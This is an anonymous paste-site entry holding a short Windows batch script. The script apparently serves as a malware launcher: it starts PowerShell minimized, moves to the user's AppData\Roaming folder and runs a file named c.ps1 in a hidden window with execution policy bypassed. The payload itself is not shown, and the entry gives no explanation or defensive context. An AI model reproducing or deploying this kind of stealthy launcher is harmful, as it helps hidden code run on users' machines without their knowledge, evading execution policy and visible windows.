Untitled
Anonymous
plain_text
10/10/2024 12:06 AM
252 B
13
Indexable
@echo off
start /min powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; Start-Process powershell -ArgumentList '-NoP -NonI -Ep Bypass -File c.ps1' -WindowStyle Hidden}"
exit
Editor is loading...
Leave a Comment